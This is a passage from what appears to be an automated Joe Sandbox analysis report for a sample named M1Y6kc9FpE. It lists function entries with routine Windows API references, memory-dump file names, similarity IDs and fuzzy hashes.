                                                                                                                                                      • Opcode Fuzzy Hash: 429cf5d7e1cc259708b6e9ca53865d3757c7cd7a2aa1153b0adaaf5be8eaf76b
                                                                                                                                                      • Instruction Fuzzy Hash: D5216576E0162A9BDB14DFEDDD81AAFB7B9BF88340F14042AF504B7202DB749E048795
                                                                                                                                                      Function 00A2EAF3 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2427045233-0
                                                                                                                                                      • Opcode ID: 4ffa3c45ef813fdbbdb89dfe9877b9c6840e26db323431faef3b3cede32c06bc
                                                                                                                                                      • Instruction ID: 45ab337b4c44c2a7a3a7f68f9a8b701b4448d95ecd1441c933a8b06fe85483b6
                                                                                                                                                      • Opcode Fuzzy Hash: 4ffa3c45ef813fdbbdb89dfe9877b9c6840e26db323431faef3b3cede32c06bc
                                                                                                                                                      • Instruction Fuzzy Hash: 8F21D835A013249EDF20DF6DDA46EEE73E9EF12750F149528F442AB181C7749D89C760
                                                                                                                                                      Function 00A4437D Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2427045233-0
                                                                                                                                                      • Opcode ID: 209912a6ad97bcb60b91881445d6497ccb5a1273f73633d4a2752b191cf8a955
                                                                                                                                                      • Instruction ID: c8183a69da5f049cd36fd2f332993dbe049dfc508ebb08afe4b4693ea728d49a
                                                                                                                                                      • Opcode Fuzzy Hash: 209912a6ad97bcb60b91881445d6497ccb5a1273f73633d4a2752b191cf8a955
                                                                                                                                                      • Instruction Fuzzy Hash: 47212C75D00208DFDB08EFE9D985BDD7BB9AF88301F144429F504EB252DA35AA85CB61
                                                                                                                                                      Function 00A53129 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A51DE6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A500BA,00000001,00000364,?,00A46C16,?,?,?,?,?,00A45269,00A4535E), ref: 00A51E27
                                                                                                                                                      • _free.LIBCMT ref: 00A53195
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                      • Opcode ID: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                                                                                                                                      • Instruction ID: 707f977d76b7874e70199ab5b0c7e7501484280f54f9a2e326f536bf893b4c96
                                                                                                                                                      • Opcode Fuzzy Hash: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                                                                                                                                      • Instruction Fuzzy Hash: F60149B32007056BEB21CF65DC85E5AFBE9FBC5371F25061DE99483280EA30A909C774
                                                                                                                                                      Function 00A44300 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2427045233-0
                                                                                                                                                      • Opcode ID: cb3a1ff041b3433c345ce6659e96f8e09ddfcf82e63caa976fed2fbeaf3b93c5
                                                                                                                                                      • Instruction ID: 8c7df39623f874bbe3bbf6e89474dee1b04fd091b937bd4832e68478b1dc2bfc
                                                                                                                                                      • Opcode Fuzzy Hash: cb3a1ff041b3433c345ce6659e96f8e09ddfcf82e63caa976fed2fbeaf3b93c5
                                                                                                                                                      • Instruction Fuzzy Hash: 60018175841248EBDF00EBE4CA86BCE77BCBF18345F444065F400AB182C638AB49CB71
                                                                                                                                                      Function 00A51DE6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A500BA,00000001,00000364,?,00A46C16,?,?,?,?,?,00A45269,00A4535E), ref: 00A51E27
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: bc539e3d5c1bde323e6f7c556293fa4e31eaf431d41e51b858fd4e9c87c6a1bd
                                                                                                                                                      • Instruction ID: d82132243ec1c3382064bb9d8ea60c752cd13b72ce3e38a71acd60b1d32acff8
                                                                                                                                                      • Opcode Fuzzy Hash: bc539e3d5c1bde323e6f7c556293fa4e31eaf431d41e51b858fd4e9c87c6a1bd
                                                                                                                                                      • Instruction Fuzzy Hash: DCF0E9326056246BEB215B76AC07F7B7758FF807B2B184121FC08AA190DB70ED0982E0
                                                                                                                                                      Function 00A280EC Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: 08b2b1fa5a63c9ccd1898f29e3eef64d684c95c88ffa2ec68675fda2b104d47e
                                                                                                                                                      • Instruction ID: 4adf5df475aa93c0c13d68039b58a492b96de58ce0293a7e111a3f5a3afb7b65
                                                                                                                                                      • Opcode Fuzzy Hash: 08b2b1fa5a63c9ccd1898f29e3eef64d684c95c88ffa2ec68675fda2b104d47e
                                                                                                                                                      • Instruction Fuzzy Hash: 8BF0C2B4A41710BBD621EB288D03F9BBAD8BFC4B00F004929B3586B1C3DBB427018259
                                                                                                                                                      Function 00A5040E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00A4535E,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?,?,?,?), ref: 00A50440
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: fff6c84d50a761b3175e3bb0ac510a31200355c3a64328c03094f3f4404b22f2
                                                                                                                                                      • Instruction ID: edcdc84eeb54eb0fc8589f8d5b160bca1ac9780601cbefc473acd5a8b15891b2
                                                                                                                                                      • Opcode Fuzzy Hash: fff6c84d50a761b3175e3bb0ac510a31200355c3a64328c03094f3f4404b22f2
                                                                                                                                                      • Instruction Fuzzy Hash: F9E06D362017219AEA3177A5AD01F9B7A78BF813B2F194120FE4D96192DB70CC4981A2
                                                                                                                                                      Function 00A2F711 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A2F826: __EH_prolog3_GS.LIBCMT ref: 00A2F830
                                                                                                                                                        • Part of subcall function 00A2F826: FindFirstFileW.KERNELBASE(?,?,00000274,00A2F733,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?), ref: 00A2F859
                                                                                                                                                        • Part of subcall function 00A2F826: FindFirstFileW.KERNEL32(?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2F8A4
                                                                                                                                                        • Part of subcall function 00A2F826: GetLastError.KERNEL32(?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049,?,00000000), ref: 00A2F902
                                                                                                                                                      • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?,?,?,?), ref: 00A2F739
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 765066492-0
                                                                                                                                                      • Opcode ID: c852a86e485b4a28e4229fbf79dc1cf72dd738e3d6428611f7af70eef003b784
                                                                                                                                                      • Instruction ID: b3f901831f2ec55c5fdd9f2c8721338314540760135510e0c0efa4af24918fc2
                                                                                                                                                      • Opcode Fuzzy Hash: c852a86e485b4a28e4229fbf79dc1cf72dd738e3d6428611f7af70eef003b784
                                                                                                                                                      • Instruction Fuzzy Hash: CDF0A7350097A0AECE215BAC5904A8BBFF06F17371F004B39F4F912192C23094959B22
                                                                                                                                                      Function 00A373F8 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00A3742D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExecutionStateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2211380416-0
                                                                                                                                                      • Opcode ID: 6b3f9cb4b542e110d64b78bd3d3a90e0ae2723d21db1ee7905d75e4b14c7d47c
                                                                                                                                                      • Instruction ID: 14bd451fb58273b3816d21e79ab6578bc4896c20f9783365d2f4890febaa7ed8
                                                                                                                                                      • Opcode Fuzzy Hash: 6b3f9cb4b542e110d64b78bd3d3a90e0ae2723d21db1ee7905d75e4b14c7d47c
                                                                                                                                                      • Instruction Fuzzy Hash: 56D02B1074822076EA21B7293A877FE290A4FC2B21F090035F044531C3DF981C4783E6
                                                                                                                                                      Function 00A211DD Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00A21206
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                      • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                                                                                                                      • Instruction ID: 386280589dbd64ebdde644e160b9694532a3e7f0c51f7017e692e94794054be0
                                                                                                                                                      • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                                                                                                                      • Instruction Fuzzy Hash: 10D05E7A6026228F872CEB78D67686E72945EB4345311863DF02ACAA82EF21CC15C755
                                                                                                                                                      Function 00A3EB06 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00A3EB0C
                                                                                                                                                        • Part of subcall function 00A3E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A3E86A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1915507550-0
                                                                                                                                                      • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                                                                                                                      • Instruction ID: eaaf43f25b9054ebbef2f6d54fdacfd64e760b727d0257e3f3cb657f8976f7e2
                                                                                                                                                      • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                                                                                                                      • Instruction Fuzzy Hash: D2D0A930600209BBDF02AF309C0297EBAA8EF00340F00C021F802852D1EAB0EA10A6A0
                                                                                                                                                      Function 00A44231 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00A44256
                                                                                                                                                        • Part of subcall function 00A40678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A40689
                                                                                                                                                        • Part of subcall function 00A40678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4069A
                                                                                                                                                        • Part of subcall function 00A40678: IsDialogMessageW.USER32(00010452,?), ref: 00A406AE
                                                                                                                                                        • Part of subcall function 00A40678: TranslateMessage.USER32(?), ref: 00A406BC
                                                                                                                                                        • Part of subcall function 00A40678: DispatchMessageW.USER32(?), ref: 00A406C6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 897784432-0
                                                                                                                                                      • Opcode ID: 5c494f8f932f30c6bf2537b703fc6f0338d97edc5a66d2f7d4c3c50941dc2a33
                                                                                                                                                      • Instruction ID: 7af027d54cf223c6601caac1a03beaa49dc1c2dd17bb612fd21f24632b31fa10
                                                                                                                                                      • Opcode Fuzzy Hash: 5c494f8f932f30c6bf2537b703fc6f0338d97edc5a66d2f7d4c3c50941dc2a33
                                                                                                                                                      • Instruction Fuzzy Hash: 70D09E35144300BAD6126B91CE07F0A7AE2EB88B04F008554B749340B1C6A29E71AB12
                                                                                                                                                      Function 00A44D2C Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A44DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00A44DF2
                                                                                                                                                      • DloadProtectSection.DELAYIMP ref: 00A44D54
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AcquireDloadExclusiveLockProtectSection
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3680172570-0
                                                                                                                                                      • Opcode ID: 28fa8f79c35b7e4509e5a4ad13f5c4464c93e46b0e74c6f7f33f0dc213bb6a08
                                                                                                                                                      • Instruction ID: 9f8f531f37f7aff5a2e3c5b730a73cab8a9d10dcba26bb6e5680b2021a5be51f
                                                                                                                                                      • Opcode Fuzzy Hash: 28fa8f79c35b7e4509e5a4ad13f5c4464c93e46b0e74c6f7f33f0dc213bb6a08
                                                                                                                                                      • Instruction Fuzzy Hash: 96D0127CF00660AFD729EFB49D4F75432A0B38C704F804501F259951A6CFF064919641
                                                                                                                                                      Function 00A28180 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A28187
                                                                                                                                                        • Part of subcall function 00A34F2B: __EH_prolog3.LIBCMT ref: 00A34F32
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: 7809d0e19781932ffa1f83651d7a3ba35a1ff984a8be620f9b92f271ab5a86ef
                                                                                                                                                      • Instruction ID: 11a1adbf8903635e6c4856235f05b2299a1f3960a74468401a6a66fd628e36ec
                                                                                                                                                      • Opcode Fuzzy Hash: 7809d0e19781932ffa1f83651d7a3ba35a1ff984a8be620f9b92f271ab5a86ef
                                                                                                                                                      • Instruction Fuzzy Hash: 6AC012B9E00924C3DB02BF68A60376D2120AB84B02F400568F6005F283CFB84E0183CA
                                                                                                                                                      Function 00A2E152 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileType.KERNELBASE(000000FF,00A2E052,?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E15E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
